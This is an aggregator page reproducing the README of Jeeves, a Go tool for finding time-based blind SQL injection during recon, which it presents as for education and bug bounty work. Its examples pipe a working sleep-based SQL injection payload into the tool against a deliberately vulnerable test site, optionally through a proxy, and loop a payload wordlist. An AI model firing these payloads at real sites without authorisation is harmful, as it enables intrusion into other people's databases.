Git Product home page Git Product logo

jeeves's Introduction

Jeeves


Usage โ€ข Installation

Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

- Installation & Requirements:

> go install github.com/ferreiraklet/Jeeves@latest

OR

> git clone https://github.com/ferreiraklet/Jeeves.git

> cd Jeeves

> go build jeeves.go

> chmod +x jeeves

> ./jeeves -h

- Usage & Explanation:

  • In Your recon process, you may find endpoints that can be vulnerable to sql injection,


    Jeeves reads from stdin:

    echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves --payload-time time_payload

    In --payload-time you must use the time mentioned in payload.


    You can use a file containing a list of targets as well:

    cat targets | jeeves --payload-time 5


  • You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght

    • Another examples of usage:

       Usage:
 --payload-time,      The time from payload
 --proxy              Send traffic to a proxy
 -H, --headers        Custom Headers
 -h                   Show This Help Message

    Ex 1 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5


    Ex 2 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves --payload-time 10


    Ex 3 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://179.67.16.10:8081"


    Ex 4 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://179.67.16.10:8081" -H "User-Agent: xxxx"


    You can specify more than one header, OBS: Be careful, the syntax must be exact the same, Ex:

    Ex 5 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy -H "Testing: testing;OtherHeader: Value;Other2: Value"

    TIP:

    Using with sql payloads wordlist cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves --payload-time 5;done


This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.

jeeves's People

Contributors

ferreiraklet avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.